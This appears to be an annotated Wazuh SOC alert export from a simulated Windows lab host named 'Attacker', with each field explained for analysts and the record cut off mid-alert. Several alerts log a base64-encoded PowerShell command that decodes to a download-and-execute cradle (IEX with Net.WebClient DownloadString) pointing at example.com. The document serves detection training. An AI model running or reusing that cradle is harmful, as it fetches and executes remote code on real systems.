timestamp:  2025-04-24T22:40:04.384+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  99
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534404.1957344
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:02.0874693Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285678
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:00.599 ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} ProcessId: 16112 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} ParentProcessId: 10672 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:00.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc0-680a-bd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdbd-680a-bb0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  10672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:05.200+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:05.200+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  103
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534405.1965415
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:02.5743551Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285679
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:02.553 ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} ProcessId: 16112 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_n3jscojm.st0.ps1 CreationUtcTime: 2025-04-24 22:40:02.553 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:02.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc0-680a-bd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  16112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_n3jscojm.st0.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:02.553
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:40:06.481+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:06.481+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Audit Audit Policy Change' is set to include 'Success'.: Status changed from passed to 'not applicable'
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19012
Numeric ID of the detection rule that fired.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['17.7.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['8.5']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534406.1968184
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  2137254061
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26161
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Audit Audit Policy Change' is set to include 'Success'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This subcategory reports changes in audit policy including SACL changes. Events for this subcategory include: - 4715: The audit policy (SACL) on an object was changed. - 4719: System audit policy was changed. - 4902: The Per-user audit policy table was created. - 4904: An attempt was made to register a security event source. - 4905: An attempt was made to unregister a security event source. - 4906: The CrashOnAuditFail value has changed. - 4907: Auditing settings on object were changed. - 4908: Special Groups Logon table modified. - 4912: Per User Audit Policy was changed. The recommended state for this setting is to include: Success.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Auditing these events may be useful when investigating a security incident.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to include Success: Computer Configuration\Policies\Windows Settings\Security Settings\Advanced Audit Policy Configuration\Audit Policies\Policy Change\Audit Audit Policy Change
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  17.7.1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  8.5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.command:  ['auditpol.exe /get /subcategory:"Audit Policy Change"']
Shell/registry query used in the test – reproduce it yourself when verifying.

data.sca.check.result:  not applicable
PASS or FAIL. Red = needs fixing.

data.sca.check.reason:  Timeout overtaken running command 'auditpol.exe /get /subcategory:"Audit Policy Change"'
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.previous_result:  passed
Last run’s pass/fail – trend spotting for drift.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Low
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  No strong indicators
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:07.385+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:07.385+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  100
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534407.1971685
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:04.7532925Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285708
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:04.088 ProcessGuid: {94294ddc-bdc4-680a-bf0b-000000000e00} ProcessId: 15516 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} ParentProcessId: 16112 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:04.088
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdc4-680a-bf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  15516
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdc0-680a-bd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  16112
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:07.481+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:07.481+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  104
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
